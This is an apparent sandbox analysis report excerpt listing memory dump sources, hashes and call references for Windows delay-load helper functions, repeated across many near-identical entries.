              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 9b39169978ff52a156fee66d35c2e99aa9f5e03d71631fd27386dc665408866d
              • Instruction ID: 6ed6baa08284fb19484243f45c6bfa3166fe01620bec97ab9949d8d1c4aad50b
              • Opcode Fuzzy Hash: 9b39169978ff52a156fee66d35c2e99aa9f5e03d71631fd27386dc665408866d
              • Instruction Fuzzy Hash: 53B012922AC0016D790873076C03F3E02CDC0C4B1033085FBB109D0085D5C44C094431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 2dbbfc8f98215b756342f868fa251c2ce70cd82e5863abe7ee29576dda49a12c
              • Instruction ID: aba144b73c01ef4be1df04382a4a60343d1d8bf60e7c966d528bd0c63c4ba813
              • Opcode Fuzzy Hash: 2dbbfc8f98215b756342f868fa251c2ce70cd82e5863abe7ee29576dda49a12c
              • Instruction Fuzzy Hash: E0B012A226C001AD3D4873076C03E3A02CCC0C0B10330C1FBB409D0095D5C84C044431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e364df673896c943ff42bcf12aa183568a695885a27611667315514f289fe006
              • Instruction ID: b203c4860d60fc5e03a2c639483af3119c1731a67f9d3a88074702b9f68170ed
              • Opcode Fuzzy Hash: e364df673896c943ff42bcf12aa183568a695885a27611667315514f289fe006
              • Instruction Fuzzy Hash: 5CB0129636C0426D350C521B2D17E7B02DCC0C0B2033084FAB109C0091DEC08C054031
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c648951c834e7b6617b672b21df021fa844be8b5c59a9f58c1f8a7d7b05c40be
              • Instruction ID: 665ecaa8684d2424f3e6ab0ff250d9d5d04e3e629fe655fac6f66129ed4c0093
              • Opcode Fuzzy Hash: c648951c834e7b6617b672b21df021fa844be8b5c59a9f58c1f8a7d7b05c40be
              • Instruction Fuzzy Hash: 31B0129636C002AD354C521B2C17E7B02ECC0C0B1033084FAB409C1091DAC08C084131
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 84bd069a6e98e4650809cd1959307a6b53147ef25da6c5d3b202af07f7537b09
              • Instruction ID: 8e5cb3fa6710fcc54daf1f967e3913c65ae7e01acd6c90765b8513c7c25a3831
              • Opcode Fuzzy Hash: 84bd069a6e98e4650809cd1959307a6b53147ef25da6c5d3b202af07f7537b09
              • Instruction Fuzzy Hash: 5FB0129636C0016D350C522B2C17F7A02DCD0C0B1033044FAB00AC0091DAC08C084031
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DBD5
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: cd7027cd63e85b3a4da5000bdb46dbe0f524b4d124af87cbf3ec82dc023b8f4c
              • Instruction ID: 5f43866e6035117fed52eda535ab58e8f912d4535f79bdc6f35836b847b4c17f
              • Opcode Fuzzy Hash: cd7027cd63e85b3a4da5000bdb46dbe0f524b4d124af87cbf3ec82dc023b8f4c
              • Instruction Fuzzy Hash: 90B0129637C10A7D360C52172C17D7B02DCC0C0B1033045FAB005D00919AC08C484031
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DAB2
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d63d274609f2e2233e515689d8e71d9ad81bdf704f00d71739c9f12fc19be62c
              • Instruction ID: 901370f4840824c365f79f0f730b89745d3211eb0a347d134e3963e87da9a5a4
              • Opcode Fuzzy Hash: d63d274609f2e2233e515689d8e71d9ad81bdf704f00d71739c9f12fc19be62c
              • Instruction Fuzzy Hash: E4B012922AC101AD790873076D43F3A02CDD0C0B1033041FBB009D0085D5C44C044531
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c07f540b25aec0ff15dfa4d89256365ebb54ecf10da7e381a27030e9a4f18465
              • Instruction ID: b70a8c3abe5e6cae9ad4bedc26293846150989e7aaa79dc24ecb379b05b67120
              • Opcode Fuzzy Hash: c07f540b25aec0ff15dfa4d89256365ebb54ecf10da7e381a27030e9a4f18465
              • Instruction Fuzzy Hash: A6B0129666C2057D350C2607EE03D7602FCC1C0B103304BFEB306F006096C0DC445032
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 6982a055e6bbfb491f4b180f7ab8f32e4a123c8a61209e2dd3d4dbc072dc692a
              • Instruction ID: 3917b7f60a5c1512a0bfbfadaac1b908c4e186e08029e6ecfb3375a06f12b0ba
              • Opcode Fuzzy Hash: 6982a055e6bbfb491f4b180f7ab8f32e4a123c8a61209e2dd3d4dbc072dc692a
              • Instruction Fuzzy Hash: 37B0129667C2016D350C660BEC03E7602FCC0C0B103304AFFB30AE0060D6C0DC044032
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9DC36
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: ba30fcae03e970ba170c565141ae08d9f145101f324adce1bb8a79c00dda286c
              • Instruction ID: 6b85207b7f9c0dde14ef42351f28f44dd6dc0e726fdff77ed4d9cfdb0dfc16ff
              • Opcode Fuzzy Hash: ba30fcae03e970ba170c565141ae08d9f145101f324adce1bb8a79c00dda286c
              • Instruction Fuzzy Hash: 58B0129666C1016D350C660BEC03E7602FCC0C5B103308AFEB70AE0060D6C0DC044032
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d0909cb7d433984997ad8892662907d85e7eaac46ac5e4e453ee8503cc627b02
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: d0909cb7d433984997ad8892662907d85e7eaac46ac5e4e453ee8503cc627b02
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: d935ff79484d8af5ff665994de28910f3c70e5d285c432a58357971aee7c6078
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: d935ff79484d8af5ff665994de28910f3c70e5d285c432a58357971aee7c6078
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: af400bfd609b2fae0422e87880b62c86630542142047269783ab7fba4e667be6
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: af400bfd609b2fae0422e87880b62c86630542142047269783ab7fba4e667be6
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 44b9a75d73d568a2a5cb3f9ba1b8bf6822b02343591fc7356e0937cdf7baeb05
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: 44b9a75d73d568a2a5cb3f9ba1b8bf6822b02343591fc7356e0937cdf7baeb05
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e54c3a3a750d7b9b0ffb2395a19c7cda0753781b8ba05035c3e07d50d5b7068b
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: e54c3a3a750d7b9b0ffb2395a19c7cda0753781b8ba05035c3e07d50d5b7068b
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: f64204fd980b98251aee1fa46b8413216c1275a385ab2649e43c084f943b1893
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: f64204fd980b98251aee1fa46b8413216c1275a385ab2649e43c084f943b1893
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BC4000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BE1000.00000004.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319849527.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_b80000_file.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b31cde621aad2ed589481ac6878e2552f9d1b28fb8cb81f0dd6419fafd95d22c
              • Instruction ID: eea3e118674c5a4fb69f20dc15124ad1cf1ec3025d648af3b5887358ef6be7ee
              • Opcode Fuzzy Hash: b31cde621aad2ed589481ac6878e2552f9d1b28fb8cb81f0dd6419fafd95d22c
              • Instruction Fuzzy Hash: 4FA001A66AD502BD79086652AD97F7A029CC8C5B6133089BAB44AA40D2A9C468495831
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 00B9D8A3
                • Part of subcall function 00B9DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00B9DFD6
                • Part of subcall function 00B9DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00B9DFE7
              Memory Dump Source
              • Source File: 00000001.00000002.1319458559.0000000000B81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B80000, based on PE: true
              • Associated: 00000001.00000002.1319440881.0000000000B80000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319488332.0000000000BB3000.00000002.00000001.01000000.00000003.sdmp
              • Associated: 00000001.00000002.1319514009.0000000000BBE000.00000004.00000001.01000000.00000003.sdmp
